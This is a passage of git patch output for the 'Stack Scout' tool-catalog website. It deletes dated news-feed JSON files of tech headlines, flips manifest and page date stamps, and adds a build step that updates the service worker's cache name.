"https://github.com/wolfSSL/wolfCOSE", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9400000000000001, - "date": "2026-05-30T20:42:28.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI Extends Codex Computer Use To Windows", - "url": "https://www.digg.com/ai/24n5kcme", - "source": "Digg AI", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.94, - "date": "2026-05-30T05:18:16.464Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data", - "url": "https://www.digg.com/ai/hqutws0i", - "source": "Digg AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.94, - "date": "2026-05-30T05:18:16.456Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Kore: Binary File Format Optimized for Modern Data Systems (Open Source)", - "url": "https://github.com/arunkatherashala/Kore", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8899999999999999, - "date": "2026-05-30T20:54:22.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "ChatGPT — Release Notes", - "url": "https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.", - "source": "The Verge AI", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.76, - "date": "2026-05-30T05:18:42.413Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Show HN: Open Envelope – an open schema for defining AI agent teams", - "url": "https://openenvelope.org/docs/schema/", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.75, - "date": "2026-05-28T20:30:20.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-31.json b/data/news-feed-2026-05-31.json deleted file mode 100644 index 8ba62ae..0000000 --- a/data/news-feed-2026-05-31.json +++ /dev/null @@ -1,25 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.119Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-31", - "article_count": 1, - "archived_story_count": 98, - "articles": [ - { - "title": "Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal", - "url": "https://github.com/marekkowalczyk/breathe-cli", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.7699999999999999, - "date": "2026-05-30T20:30:53.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-01.json b/data/news-feed-2026-06-01.json deleted file mode 100644 index 08dc6f1..0000000 --- a/data/news-feed-2026-06-01.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.419Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-06-01", - "article_count": 5, - "archived_story_count": 220, - "articles": [ - { - "title": "Nvidia announces new AI chip for personal computers", - "url": "https://www.bbc.com/news/articles/crmp9mppvzro", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-06-01T10:33:25.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "AI Agent Guidelines for CS336 at Stanford", - "url": "https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md", - "source": "Hacker News", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 0.91, - "date": "2026-06-01T16:41:49.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "OpenAI frontier models and Codex are now available on AWS", - "url": "https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.83, - "date": "2026-06-01T21:50:02.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Malicious npm packages detected across Red Hat Cloud Services", - "url": "https://github.com/RedHatInsights/javascript-clients/issues/492", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.83, - "date": "2026-06-01T13:30:21.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Movwin: My (Unpublished) TUI Framework", - "url": "https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.7699999999999999, - "date": "2026-05-30T01:07:42.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-02.json b/data/news-feed-2026-06-02.json deleted file mode 100644 index 48cbc39..0000000 --- a/data/news-feed-2026-06-02.json +++ /dev/null @@ -1,72 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.626Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-06-02", - "article_count": 4, - "archived_story_count": 241, - "articles": [ - { - "title": "Microsoft announces Scout, an autonomous AI agent built on OpenClaw", - "url": "https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html", - "source": "Hacker News", - "tags": [ - "product_launch", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "agent_tool" - ], - "importance": 1, - "date": "2026-06-02T18:19:27.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Alphabet announces $80B equity capital raise to expand AI infra and compute", - "url": "https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-06-01T20:55:15.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "HP re-releases classic computer science calculator: The HP-16C", - "url": "https://hpcalcs.com/product/hp-16c-collectors-edition/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 0.9400000000000001, - "date": "2026-06-02T19:02:40.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Apple rejected my dictation app for using the accessibility API", - "url": "https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.86, - "date": "2026-06-02T12:00:03.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-03.json b/data/news-feed-2026-06-03.json deleted file mode 100644 index 473709d..0000000 --- a/data/news-feed-2026-06-03.json +++ /dev/null @@ -1,102 +0,0 @@ -{ - "generated": "2026-06-05T00:44:45.899Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-06-03", - "article_count": 6, - "archived_story_count": 269, - "articles": [ - { - "title": "Ableton Extensions SDK", - "url": "https://www.ableton.com/en/live/extensions/", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.8200000000000001, - "date": "2026-06-03T20:39:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Gooey: A GPU-accelerated UI framework for Zig", - "url": "https://github.com/duanebester/gooey", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-06-03T17:12:27.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Capstone – multi-platform, multi-architecture disassembly framework", - "url": "https://www.capstone-engine.org/", - "source": "Hacker News", - "tags": [ - "developer_tool" - ], - "matching_tags": [ - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-06-03T01:59:46.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers", - "url": "https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.8899999999999999, - "date": "2026-06-03T17:01:00.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Roku LT Operating System open source distribution", - "url": "https://blog.roku.com/developer/roku-lt-os", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.86, - "date": "2026-06-03T01:13:38.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", - "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.6599999999999999, - "date": "2026-06-03T21:55:23.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-04.json b/data/news-feed-2026-06-04.json deleted file mode 100644 index 2931428..0000000 --- a/data/news-feed-2026-06-04.json +++ /dev/null @@ -1,86 +0,0 @@ -{ - "generated": "2026-06-04T21:49:41.031Z", - "site": "Stack Scout", - "article_count": 5, - "articles": [ - { - "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", - "url": "https://github.com/anthropics/defending-code-reference-harness", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T20:11:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Ableton Extensions SDK", - "url": "https://www.ableton.com/en/live/extensions/", - "source": "Hacker News", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-03T20:39:34.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Show HN: Open Terminal – A Bloomberg Style App for Research", - "url": "https://tesseractanalytics.ai/", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T15:58:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Meta's ships facial recognition on smart glasses", - "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.48, - "date": "2026-06-04T19:36:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", - "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", - "source": "Hacker News", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 0.48, - "date": "2026-06-03T21:55:23.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-05.json b/data/news-feed-2026-06-05.json deleted file mode 100644 index 32afd3d..0000000 --- a/data/news-feed-2026-06-05.json +++ /dev/null @@ -1,84 +0,0 @@ -{ - "generated": "2026-06-05T17:45:11.045Z", - "site": "Stack Scout", - "article_count": 5, - "articles": [ - { - "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", - "url": "https://github.com/anthropics/defending-code-reference-harness", - "source": "Hacker News", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 0.5599999999999999, - "date": "2026-06-04T20:11:20.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Open Code Review – An AI-powered code review CLI tool", - "url": "https://github.com/alibaba/open-code-review", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.48, - "date": "2026-06-05T00:04:29.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Meta's ships facial recognition on smart glasses", - "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", - "source": "Hacker News", - "tags": [ - "tool_update" - ], - "matching_tags": [ - "tool_update" - ], - "importance": 0.48, - "date": "2026-06-04T19:36:48.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "databow: a Rust CLI to query any database with an ADBC driver", - "url": "https://columnar.tech/blog/introducing-databow//", - "source": "Hacker News", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 0.48, - "date": "2026-06-02T23:11:13.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Branchless Quicksort faster than std:sort and pdqsort with C and C++ API", - "url": "https://tiki.li/blog/blqsort", - "source": "Hacker News", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 0.48, - "date": "2026-06-02T20:00:54.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-06-06.json b/data/news-feed-2026-06-06.json deleted file mode 100644 index 842deea..0000000 --- a/data/news-feed-2026-06-06.json +++ /dev/null @@ -1,6 +0,0 @@ -{ - "generated": "2026-06-06T12:00:13.600Z", - "site": "Stack Scout", - "article_count": 0, - "articles": [] -} \ No newline at end of file diff --git a/data/news-feed-latest.json b/data/news-feed-latest.json deleted file mode 100644 index 842deea..0000000 --- a/data/news-feed-latest.json +++ /dev/null @@ -1,6 +0,0 @@ -{ - "generated": "2026-06-06T12:00:13.600Z", - "site": "Stack Scout", - "article_count": 0, - "articles": [] -} \ No newline at end of file diff --git a/data/page-registry.json b/data/page-registry.json index b3cacce..33a29ae 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-06", + "generatedAt": "2026-06-04", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 29ddbed..7d7a77b 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index 8074788..dee2917 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 21ac358..779cf1b 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-06", - "updatedAt": "2026-06-06", + "generatedAt": "2026-06-04", + "updatedAt": "2026-06-04", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index 7805e61..ec7781b 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

                  From the Stack Scout Lab

                  diff --git a/method/index.html b/method/index.html index 6a0e17f..aa83e0d 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

                  Verdict language

                  diff --git a/radar/index.html b/radar/index.html index cbc054e..4bc907f 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

                  GitHub skills ecosystem

                  diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index e4a6b8a..d390a74 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,21 +1273,6 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } -function updateServiceWorkerCacheName() { - const serviceWorkerPath = 'service-worker.js' - const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') - const next = current.replace( - /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, - `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, - ) - - if (next === current) { - throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') - } - - writeFile(serviceWorkerPath, next) -} - function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1348,7 +1333,6 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) - updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 65ca957..9ff0fb2 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-06' +const CACHE_NAME = 'stackscout-2026-06-04' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index de44888..9274b4a 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

                  n8n

                  diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index d247d4c..a333ebe 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

                  SyncPad

                  diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index f810be3..3206296 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

                  Wrangler

                  diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index 34f46cc..cedcfb4 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

                  Wrangler

                  diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 437555c..8e6dee2 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

                  GitHub MCP Server

                  diff --git a/tools/make/index.html b/tools/make/index.html index 157e8cc..cb9981e 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/n8n/index.html b/tools/n8n/index.html index e546569..2b209f0 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/openai-api/index.html b/tools/openai-api/index.html index b717fbb..b5b70ae 100644 --- a/tools/openai-api/index.html +++ b/tools/openai-api/index.html @@ -345,7 +345,7 @@

                  Playwright MCP

                  diff --git a/tools/perplexity/index.html b/tools/perplexity/index.html index cc49f23..226bd85 100644 --- a/tools/perplexity/index.html +++ b/tools/perplexity/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/playwright-mcp/index.html b/tools/playwright-mcp/index.html index 59e65bd..d2b6b07 100644 --- a/tools/playwright-mcp/index.html +++ b/tools/playwright-mcp/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/signal-stack/index.html b/tools/signal-stack/index.html index 546b067..df9fb37 100644 --- a/tools/signal-stack/index.html +++ b/tools/signal-stack/index.html @@ -255,7 +255,7 @@

                  Strudel Studio

                  diff --git a/tools/strudel-studio/index.html b/tools/strudel-studio/index.html index 0d7dbc5..dbd10d1 100644 --- a/tools/strudel-studio/index.html +++ b/tools/strudel-studio/index.html @@ -277,7 +277,7 @@

                  OpenAI API

                  diff --git a/tools/syncpad/index.html b/tools/syncpad/index.html index 741d63b..a5b9964 100644 --- a/tools/syncpad/index.html +++ b/tools/syncpad/index.html @@ -221,7 +221,7 @@

                  Canvas Planner

                  diff --git a/tools/wrangler/index.html b/tools/wrangler/index.html index 32cd6f1..2bf1dc5 100644 --- a/tools/wrangler/index.html +++ b/tools/wrangler/index.html @@ -277,7 +277,7 @@

                  Playwright MCP

                  diff --git a/updates/index.html b/updates/index.html index 63d8716..a824e2d 100644 --- a/updates/index.html +++ b/updates/index.html @@ -364,7 +364,7 @@

                  Wrangler 4.58.0 improved command grouping and auth ergonomics

                  From 4caee1ee32c0553489a47c1bece3592672d46b57 Mon Sep 17 00:00:00 2001 From: Kol Tregaskes Date: Sat, 6 Jun 2026 13:42:37 +0100 Subject: [PATCH 5/5] fix: refresh service worker cache during build --- catalog/index.html | 2 +- categories/apis/index.html | 2 +- categories/clis/index.html | 2 +- categories/desktop-apps/index.html | 2 +- categories/index.html | 2 +- categories/mcps/index.html | 2 +- categories/web-apps/index.html | 2 +- categories/web-services/index.html | 2 +- categories/websites/index.html | 2 +- collections/index.html | 2 +- data/categories-manifest.json | 4 ++-- data/collections-manifest.json | 4 ++-- data/methodology-manifest.json | 4 ++-- data/page-registry.json | 2 +- data/radar-manifest.json | 4 ++-- data/tools-manifest.json | 4 ++-- data/updates-manifest.json | 4 ++-- index.html | 2 +- method/index.html | 2 +- radar/index.html | 2 +- scripts/build-stackscout.js | 16 ++++++++++++++++ service-worker.js | 2 +- tools/anthropic-api/index.html | 2 +- tools/canvas-planner/index.html | 2 +- tools/gh-cli/index.html | 2 +- tools/github-mcp-server/index.html | 2 +- tools/hugging-face/index.html | 2 +- tools/make/index.html | 2 +- tools/n8n/index.html | 2 +- tools/openai-api/index.html | 2 +- tools/perplexity/index.html | 2 +- tools/playwright-mcp/index.html | 2 +- tools/signal-stack/index.html | 2 +- tools/strudel-studio/index.html | 2 +- tools/syncpad/index.html | 2 +- tools/wrangler/index.html | 2 +- updates/index.html | 2 +- 37 files changed, 58 insertions(+), 42 deletions(-) diff --git a/catalog/index.html b/catalog/index.html index 6afa345..7d20915 100644 --- a/catalog/index.html +++ b/catalog/index.html @@ -676,7 +676,7 @@

                  SyncPad

                  diff --git a/categories/apis/index.html b/categories/apis/index.html index 4175a4c..b12e7da 100644 --- a/categories/apis/index.html +++ b/categories/apis/index.html @@ -175,7 +175,7 @@

                  Anthropic API

                  diff --git a/categories/clis/index.html b/categories/clis/index.html index 81b6211..aaabad1 100644 --- a/categories/clis/index.html +++ b/categories/clis/index.html @@ -175,7 +175,7 @@

                  Wrangler

                  diff --git a/categories/desktop-apps/index.html b/categories/desktop-apps/index.html index c98a026..4df671e 100644 --- a/categories/desktop-apps/index.html +++ b/categories/desktop-apps/index.html @@ -141,7 +141,7 @@

                  SyncPad

                  diff --git a/categories/index.html b/categories/index.html index c9acbbd..64bb4cf 100644 --- a/categories/index.html +++ b/categories/index.html @@ -228,7 +228,7 @@

                  Desktop Apps

                  diff --git a/categories/mcps/index.html b/categories/mcps/index.html index f862d74..30e54c8 100644 --- a/categories/mcps/index.html +++ b/categories/mcps/index.html @@ -175,7 +175,7 @@

                  Playwright MCP

                  diff --git a/categories/web-apps/index.html b/categories/web-apps/index.html index cb3bc04..c35f706 100644 --- a/categories/web-apps/index.html +++ b/categories/web-apps/index.html @@ -209,7 +209,7 @@

                  Strudel Studio

                  diff --git a/categories/web-services/index.html b/categories/web-services/index.html index cf70f1a..15036a9 100644 --- a/categories/web-services/index.html +++ b/categories/web-services/index.html @@ -175,7 +175,7 @@

                  Make

                  diff --git a/categories/websites/index.html b/categories/websites/index.html index 999627d..1c17ed0 100644 --- a/categories/websites/index.html +++ b/categories/websites/index.html @@ -175,7 +175,7 @@

                  Hugging Face

                  diff --git a/collections/index.html b/collections/index.html index ae64571..c24ecb3 100644 --- a/collections/index.html +++ b/collections/index.html @@ -175,7 +175,7 @@

                  From the Stack Scout Lab

                  diff --git a/data/categories-manifest.json b/data/categories-manifest.json index 78826b4..0e2dc9c 100644 --- a/data/categories-manifest.json +++ b/data/categories-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Categories", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "categories": [ { "slug": "websites", diff --git a/data/collections-manifest.json b/data/collections-manifest.json index c6f8013..871d976 100644 --- a/data/collections-manifest.json +++ b/data/collections-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Collections", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "collections": [ { "slug": "creator-stack", diff --git a/data/methodology-manifest.json b/data/methodology-manifest.json index f57652d..0f23911 100644 --- a/data/methodology-manifest.json +++ b/data/methodology-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Methodology", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "thesis": "Stack Scout is a public guide, not a benchmark lab. We badge selectively, update from official sources where possible, and avoid pretending every fast-moving tool deserves a fixed numeric score.", "principles": [ { diff --git a/data/page-registry.json b/data/page-registry.json index 33a29ae..b3cacce 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-04", + "generatedAt": "2026-06-06", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 7d7a77b..29ddbed 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index dee2917..8074788 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 779cf1b..21ac358 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ec7781b..7805e61 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

                  From the Stack Scout Lab

                  diff --git a/method/index.html b/method/index.html index aa83e0d..6a0e17f 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

                  Verdict language

                  diff --git a/radar/index.html b/radar/index.html index 4bc907f..cbc054e 100644 --- a/radar/index.html +++ b/radar/index.html @@ -164,7 +164,7 @@

                  GitHub skills ecosystem

                  diff --git a/scripts/build-stackscout.js b/scripts/build-stackscout.js index d390a74..e4a6b8a 100644 --- a/scripts/build-stackscout.js +++ b/scripts/build-stackscout.js @@ -1273,6 +1273,21 @@ ${routes.map((route) => ` ${PUBLIC_BASE_URL}${route}`).jo ` } +function updateServiceWorkerCacheName() { + const serviceWorkerPath = 'service-worker.js' + const current = fs.readFileSync(path.join(ROOT_DIR, serviceWorkerPath), 'utf8') + const next = current.replace( + /const CACHE_NAME = ['"]stackscout-\d{4}-\d{2}-\d{2}['"]/, + `const CACHE_NAME = 'stackscout-${GENERATED_AT}'`, + ) + + if (next === current) { + throw new Error('service-worker.js cache name was not updated; expected stackscout-YYYY-MM-DD declaration.') + } + + writeFile(serviceWorkerPath, next) +} + function main() { const privatePreviewExport = resolvePrivatePreviewExportPath() const site = readJson('site-source.json') @@ -1333,6 +1348,7 @@ function main() { ] writeFile('sitemap.xml', buildSitemap(sitemapRoutes)) + updateServiceWorkerCacheName() console.log( `Stack Scout build complete. Generated ${tools.length} tool pages, ${categories.length} category pages, and ${updates.length} updates.`, ) diff --git a/service-worker.js b/service-worker.js index 9ff0fb2..65ca957 100644 --- a/service-worker.js +++ b/service-worker.js @@ -1,4 +1,4 @@ -const CACHE_NAME = 'stackscout-2026-06-04' +const CACHE_NAME = 'stackscout-2026-06-06' const APP_SHELL = [ '', 'index.html', diff --git a/tools/anthropic-api/index.html b/tools/anthropic-api/index.html index 9274b4a..de44888 100644 --- a/tools/anthropic-api/index.html +++ b/tools/anthropic-api/index.html @@ -311,7 +311,7 @@

                  n8n

                  diff --git a/tools/canvas-planner/index.html b/tools/canvas-planner/index.html index a333ebe..d247d4c 100644 --- a/tools/canvas-planner/index.html +++ b/tools/canvas-planner/index.html @@ -277,7 +277,7 @@

                  SyncPad

                  diff --git a/tools/gh-cli/index.html b/tools/gh-cli/index.html index 3206296..f810be3 100644 --- a/tools/gh-cli/index.html +++ b/tools/gh-cli/index.html @@ -277,7 +277,7 @@

                  Wrangler

                  diff --git a/tools/github-mcp-server/index.html b/tools/github-mcp-server/index.html index cedcfb4..34f46cc 100644 --- a/tools/github-mcp-server/index.html +++ b/tools/github-mcp-server/index.html @@ -311,7 +311,7 @@

                  Wrangler

                  diff --git a/tools/hugging-face/index.html b/tools/hugging-face/index.html index 8e6dee2..437555c 100644 --- a/tools/hugging-face/index.html +++ b/tools/hugging-face/index.html @@ -311,7 +311,7 @@

                  GitHub MCP Server

                  diff --git a/tools/make/index.html b/tools/make/index.html index cb9981e..157e8cc 100644 --- a/tools/make/index.html +++ b/tools/make/index.html @@ -311,7 +311,7 @@

                  Anthropic API

                  diff --git a/tools/n8n/index.html b/tools/n8n/index.html index 2b209f0..e546569 100644 --- a/tools/n8n/index.html +++ b/tools/n8n/index.html @@ -311,7 +311,7 @@

                  Anthropic API

